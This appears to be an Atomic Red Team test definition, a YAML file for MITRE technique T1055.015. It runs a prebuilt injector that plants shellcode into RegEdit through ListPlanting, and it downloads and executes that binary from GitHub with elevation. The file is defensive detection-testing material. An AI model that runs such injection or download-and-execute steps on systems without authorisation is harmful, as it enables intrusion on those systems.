Atomic Red Team GUID generator
31 lines
1.6 KiB
YAML
31 lines
1.6 KiB
YAML
attack_technique: T1055.015
|
|
display_name: 'Process Injection: ListPlanting'
|
|
atomic_tests:
|
|
- name: Process injection ListPlanting
|
|
auto_generated_guid: 4f3c7502-b111-4dfe-8a6e-529307891a59
|
|
description: 'This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting exploits Window with ListView control. Code write to memory with NtWriteVirtualMemory. The shellcode is executed via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.'
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
exe_binary:
|
|
description: PE binary
|
|
type: path
|
|
default: PathToAtomicsFolder\T1055.015\bin\ListPlanting.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Injector ListPlanting.exe must exist at specified location (#{exe_binary})
|
|
prereq_command: |
|
|
if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.015/bin/ListPlanting.exe" -OutFile "#{exe_binary}"
|
|
executor:
|
|
command: |-
|
|
Start-Process "#{exe_binary}"
|
|
Start-Sleep -Seconds 7
|
|
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
|
|
cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
|
|
name: powershell
|
|
elevation_required: true
|